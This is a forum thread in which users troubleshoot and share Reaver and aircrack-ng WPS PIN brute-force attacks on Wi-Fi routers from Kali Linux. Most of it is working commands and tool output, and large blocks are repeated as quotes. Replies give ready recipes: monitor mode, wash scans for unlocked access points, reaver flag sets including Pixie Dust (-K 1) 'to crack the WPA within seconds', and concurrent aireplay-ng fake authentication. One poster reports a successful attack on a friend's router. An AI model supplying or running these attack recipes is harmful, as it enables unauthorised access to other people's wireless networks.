Kali & reaver 1.4

[Northern Lights]

Got my Alfa AWUS036H today and tried to pen my router using reaver 1.4.
I spent the last 8 hours searching the web and trying to figure it out myself, fiddled around alot, but nothing that helped so far. Now coming to you, since I cannot help feeling that my problem is kind of unique. e.g. downgrading to reaver 1.3 seems impossible, because dependencies are missing.

Code:

root@kali:~# airmon-ng start -i


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
3311	NetworkManager
3361	dhclient


Interface	Chipset		Driver


root@kali:~# kill 3311
root@kali:~# kill 3361
root@kali:~# airmon-ng start wlan0


Interface	Chipset		Driver

wlan0		Realtek RTL8187L	rtl8187 - [phy0]
				(monitor mode enabled on mon0)

root@kali:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX       5            -60        1.0               No                \\\\\\\\\\
00:0B:3B:XX:XX:XX       6            -19        1.0               No                TestAP Devolo
A0:F3:C1:XX:XX:XX       9            -33        1.0               No                MainAP Fritz
XX:XX:XX:XX:XX:XX      10            -56        1.0               No                \\\\\\\\\\
XX:XX:XX:XX:XX:XX      11            -48        1.0               No                \\\\\\\\\\
^C
root@kali:~# reaver -i mon0 -b 00:0B:3B:XX:XX:XX -c 6 -N -S -d 10 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:0B:3B:XX:XX:XX
[+] Associated with 00:0B:3B:XX:XX:XX (ESSID: TestAP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2014-12-18 00:51:02 (0 seconds/pin)
[+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save.
root@kali:~#

Also getting these errors, when trying to run the same command against my fritz!box.

Code:

root@kali:~# airmon-ng start -i


Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
3331	NetworkManager
4015	wpa_supplicant
4022	dhclient


Interface	Chipset		Driver

wlan0		Realtek RTL8187L	rtl8187 - [phy0]

root@kali:~# kill 3331
root@kali:~# kill 4015
root@kali:~# kill 4022
root@kali:~# airmon-ng start wlan0


Interface	Chipset		Driver

wlan0		Realtek RTL8187L	rtl8187 - [phy0]
				(monitor mode enabled on mon0)

root@kali:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX       5            -68        1.0               No                \\\\\\\\\\
00:0B:3B:XX:XX:XX       6            -22        1.0               No                TestAP Devolo
A0:F3:C1:XX:XX:XX       9            -37        1.0               No                MainAP Fritz
XX:XX:XX:XX:XX:XX      10            -58        1.0               No                \\\\\\\\\\
XX:XX:XX:XX:XX:XX      11            -42        1.0               No                \\\\\\\\\\
^C
root@kali:~# reaver -i mon0 -b A0:F3:C1:XX:XX:XX -c 9 -d 10 -S -N -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from A0:F3:C1:XX:XX:XX
[+] Associated with A0:F3:C1:XX:XX:XX (ESSID: MainAP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Nothing done, nothing to save.
root@kali:~#

I tried different variations, like adding -N, -S, -d 10 (and more), -win7 or just using reaver -i mon0 -b BSSID
Sometimes the channel switch progress after reaver initialization will just freeze and I have to do an other wash -i mon0 or airodump-ng mon0, before reaver continues to change channels; so I ended up always adding the -c X. Also: right after fresh boot, killing the processes and turning the card to monitor mode, reaver won't be able to use mon0 sometimes, so I have to restart the VM, hoping it works next time. *sigh* I really can't any make sense from any of this.

Tried it on both "routers" my fritz!box and devolo, with signal strength between -15 and -30. Running Kali Linux 1.0.9a amd64 (& Backtrack 5 R3 GNOME 32bit - just downloaded this, in case 1.0.9a had a bug, but same issues encountered there) as VM. I also let the programs run for 1-2hrs (infinite loops), reinitialized a couple of times, set the card to more output, but that didn't help either.



tl;dr: I can't get aircrack to work. I somehow suspect my brand new AWUS036H. Getting errors posted above. I googled and searched the web already.

[flyinghaggis]

not too sure m8 but I have always started with airmon-ng start wlan0 and then killed the processes....

have you tried your adapter using wifite?

Rab.

[L-dog23]

Reaver takes ages anyways, how long have you used it?

I start my pentest like this;

sudo airmon-ng start wlan0
sudo airodump-ng mon0
......... and so on

[mmusket33]

First we use the AWUS036H, have many of them and have never had a single problem with any device or with kali1-09a when running reaver,wash or aircrack-ng tool suite. If you just want to test the viability of your awuso36H device. reboot your kali-linux1-09a and plug in your AWUSO36H

Once up and running click on the double computer screen icon on the upper right-hand corner of the screen and remove the check from the Enable Networking.


Open a terminal window

type

airmon-ng

Under interface you will see the designator for your Realtek RTL8187L

In this example we will use wlan0 as the RTL8187 interface.

Type

airmon-ng start wlan0

You now should have a monitor called mon0

Now type

wash -i mon0

If there are any APs supporting WPS they will shortly appear.

To test reaver type

reaver -i mon0 -a -f -c ?? -b XX:XX:XX:XX:XX:XX -vv -x 60

Enter the -c channel and mac address from the wash scan

To test airodump-ng type

airodump-ng mon0

This will scan all channels looking for APs

You will come across the negative one issue with aircrack-ng BUT this problem is covered in these forums


Mteams

[Northern Lights]

Thanks for your replies and to the Admins for approving this thread! I got myself a new adapter - the AWUSO36HN, but no luck either (it's alot faster though). I tried my luck on a couple of APs, but never worked so far (0/10). Is it possible, that WPS vulnerability is no longer working on most routers due to updated firmwares?
I also saw wash listing WPS APs, that don't actually have WPS enabled, like my router.

[...] have you tried your adapter using wifite?

Rab.

I tried wifite the other day, but that doesn't work at all for me; it can't even capture the WPA handshake. When I do it manually using aireplay-ng and airodump-ng, I can capture the handshake just fine, but wifite is useless to me.

Reaver takes ages anyways, how long have you used it?

I start my pentest like this;

sudo airmon-ng start wlan0
sudo airodump-ng mon0
......... and so on

Well I let it run for a couple of hours (4-5 for one run), but it doesn't seem to work at all, just keeps looping in errors and stuff like: 0 seconds / pin.

Once up and running click on the double computer screen icon on the upper right-hand corner of the screen and remove the check from the Enable Networking.

[...]

You will come across the negative one issue with aircrack-ng BUT this problem is covered in these forums


Mteams

Thanks! But got me to the same result, as I posted above.

[L-dog23]

Maybe your card does not support injection or it is not fully supported by kali. Type the card details into google and see if they are any patches available. Im using an ACER Chromebook and while it supports injection with Aireplay-ng (2 deauths only at a time) it does not work with Reaver. I dont use reaver as much unless im using Wifite. Wifite is good but the network has to be busy.

[Northern Lights]

Maybe your card does not support injection or it is not fully supported by kali. Type the card details into google and see if they are any patches available. Im using an ACER Chromebook and while it supports injection with Aireplay-ng (2 deauths only at a time) it does not work with Reaver. I dont use reaver as much unless im using Wifite. Wifite is good but the network has to be busy.

Using the Alfa AWUS036HN, read alot of people use it and I ran the aireplay test and packet injection works.

[Northern Lights]

Oh well never mind. Packet injection seems to stop working for no reason mid process.

When I first boot up Kali, packet injection works fine most of the time, that is both for the wlan card itself and the monitor mode of it. But after running airodump-ng or reaver, it suddenly stops working and I get the "No Answer... 0 APs found error", when trying to run the packet injection test again.

Code:

aireplay-ng -9 wlan1/mon0

Have the RT2870/3070 chip in the AWUS036NH, currently running both the firmware/card and Kali out of the box; do I have to update the firmware or something else for it to work? If so how?

[ghostofaaron]

i have the best results with reaver , with the following commands " reaver -i mon0 -b -c -f -v -d 0 -x 60 -A -n , at the same time in another terminal window aireplay-ng mon0 -1 120 -b -e

with these two commands i have the best result in bruteforcing wps

greetz
ghostofaaron

[TroY]

Have the same issue. Also working with an updated version of kali linux (in VirtualBox) and AWUS036H and after a while my card stops working too. Have also many AP where I get "No Response" with reaver but not all of them. Sometimes it's working for a while...

Would be very happy when we can solve the problem of our wifi card. Does anyone else noticed this issue?

[soxrok2212]

Have the same issue. Also working with an updated version of kali linux (in VirtualBox) and AWUS036H and after a while my card stops working too. Have also many AP where I get "No Response" with reaver but not all of them. Sometimes it's working for a while...

Would be very happy when we can solve the problem of our wifi card. Does anyone else noticed this issue?

When you try to start monitor mode in aircrack, you may see a warning to kill some of the networking processes. BEFORE you plug in your card, try running

Code:

airmon-ng check kill

This should stop all those processes. Then wait a few seconds and then plug in your wireless adapter and start it using

Code:

airmon-ng start wlanx

This should eliminate the problem where your card may randomly stop working... at least it did for me.

As for the reaver part, can you confirm that injection is working?

Code:

aireplay-ng -9 monx

Post the results back here.

[Northern Lights]

Success!! Thanks for all the help so far. I successfully ran my first reaver attack today at a friend's place, who has Cisco/Linksys Router and the injection now works 100%. Had success using

Code:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c X -d 60 --no-nacks -S --win7

Even though my MAC Address got blacklisted after 1hr or so; it was nice to see, that it works overall.

The issue is the following now though; when I ran this back at my place, I got all the errors I posted in my first post again, trying various of my own routers, which are mostly Fritz!Box and Arcadyan boxes. Is it possible, that they're just not affected by this and lockdown or am I doing something wrong?

[shaman dman]

Got my Alfa AWUS036H today and tried to pen my router using reaver 1.4.
I spent the last 8 hours searching the web and trying to figure it out myself, fiddled around alot, but nothing that helped so far. Now coming to you, since I cannot help feeling that my problem is kind of unique. e.g. downgrading to reaver 1.3 seems impossible, because dependencies are missing.

Code:

root@kali:~# airmon-ng start -i


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
3311	NetworkManager
3361	dhclient


Interface	Chipset		Driver


root@kali:~# kill 3311
root@kali:~# kill 3361
root@kali:~# airmon-ng start wlan0


Interface	Chipset		Driver

wlan0		Realtek RTL8187L	rtl8187 - [phy0]
				(monitor mode enabled on mon0)

root@kali:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX       5            -60        1.0               No                \\\\\\\\\\
00:0B:3B:XX:XX:XX       6            -19        1.0               No                TestAP Devolo
A0:F3:C1:XX:XX:XX       9            -33        1.0               No                MainAP Fritz
XX:XX:XX:XX:XX:XX      10            -56        1.0               No                \\\\\\\\\\
XX:XX:XX:XX:XX:XX      11            -48        1.0               No                \\\\\\\\\\
^C
root@kali:~# reaver -i mon0 -b 00:0B:3B:XX:XX:XX -c 6 -N -S -d 10 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:0B:3B:XX:XX:XX
[+] Associated with 00:0B:3B:XX:XX:XX (ESSID: TestAP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2014-12-18 00:51:02 (0 seconds/pin)
[+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save.
root@kali:~#

Also getting these errors, when trying to run the same command against my fritz!box.

Code:

root@kali:~# airmon-ng start -i


Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
3331	NetworkManager
4015	wpa_supplicant
4022	dhclient


Interface	Chipset		Driver

wlan0		Realtek RTL8187L	rtl8187 - [phy0]

root@kali:~# kill 3331
root@kali:~# kill 4015
root@kali:~# kill 4022
root@kali:~# airmon-ng start wlan0


Interface	Chipset		Driver

wlan0		Realtek RTL8187L	rtl8187 - [phy0]
				(monitor mode enabled on mon0)

root@kali:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX       5            -68        1.0               No                \\\\\\\\\\
00:0B:3B:XX:XX:XX       6            -22        1.0               No                TestAP Devolo
A0:F3:C1:XX:XX:XX       9            -37        1.0               No                MainAP Fritz
XX:XX:XX:XX:XX:XX      10            -58        1.0               No                \\\\\\\\\\
XX:XX:XX:XX:XX:XX      11            -42        1.0               No                \\\\\\\\\\
^C
root@kali:~# reaver -i mon0 -b A0:F3:C1:XX:XX:XX -c 9 -d 10 -S -N -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from A0:F3:C1:XX:XX:XX
[+] Associated with A0:F3:C1:XX:XX:XX (ESSID: MainAP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Nothing done, nothing to save.
root@kali:~#

I tried different variations, like adding -N, -S, -d 10 (and more), -win7 or just using reaver -i mon0 -b BSSID
Sometimes the channel switch progress after reaver initialization will just freeze and I have to do an other wash -i mon0 or airodump-ng mon0, before reaver continues to change channels; so I ended up always adding the -c X. Also: right after fresh boot, killing the processes and turning the card to monitor mode, reaver won't be able to use mon0 sometimes, so I have to restart the VM, hoping it works next time. *sigh* I really can't any make sense from any of this.

Tried it on both "routers" my fritz!box and devolo, with signal strength between -15 and -30. Running Kali Linux 1.0.9a amd64 (& Backtrack 5 R3 GNOME 32bit - just downloaded this, in case 1.0.9a had a bug, but same issues encountered there) as VM. I also let the programs run for 1-2hrs (infinite loops), reinitialized a couple of times, set the card to more output, but that didn't help either.



tl;dr: I can't get aircrack to work. I somehow suspect my brand new AWUS036H. Getting errors posted above. I googled and searched the web already.

I get same error. i have a netgear router model 1000vs acces point serial 83258. have a netgear wg111v2 wireless adapter use vmware workstation 12 with backtrack rs gnome 64 bit. my command lines are exactly like yours and i also get the same error messages. i am only 20 feet form the router and signal strenght is about 45. injection is working. the router is not locked.

[mmusket33]

To shaman deman

MTeams suggests you make a persistent USB install of kali and try again.

[w1l5t3r123]

terminal > iwconfig

check if you have wlan0 or wlan1

airmon-ng check kill

airmon-ng start wlan0 (mine is wlan0)

airodump-ng wlan0mon (mon is added to the wlan0 interface where old kali was just mon or mon1)

ctrl + c when you find targets

wash -i wlan0

this will find WPA ones that are not locked

ctrl + c again

reaver -i wlan0mon -b BSSID -c channel -vv verbose -K 1

this should crack the WPA within seconds and spit out pin and password

if not then use old way

reaver -i wlan0mon -b XXXXXXXXXX -c 1 -vv

if you receive AP limiting then use auto

reaver -i wlan0mon -b XXXXXXXX -c 1 -vv -a

this will auto adjust the hacking of the router

[Leo102]

First we use the AWUS036H, have many of them and have never had a single problem with any device or with kali1-09a when running reaver,wash or aircrack-ng tool suite. If you just want to test the viability of your awuso36H device. reboot your kali-linux1-09a and plug in your AWUSO36H

Once up and running click on the double computer screen icon on the upper right-hand corner of the screen and remove the check from the Enable Networking.


Open a terminal window

type

airmon-ng

Under interface you will see the designator for your Realtek RTL8187L

In this example we will use wlan0 as the RTL8187 interface.

Type

airmon-ng start wlan0

You now should have a monitor called mon0

Now type

wash -i mon0

If there are any APs supporting WPS they will shortly appear.

To test reaver type

reaver -i mon0 -a -f -c ?? -b XX:XX:XX:XX:XX:XX -vv -x 60

Enter the -c channel and mac address from the wash scan

To test airodump-ng type

airodump-ng mon0

This will scan all channels looking for APs

You will come across the negative one issue with aircrack-ng BUT this problem is covered in these forums


Mteams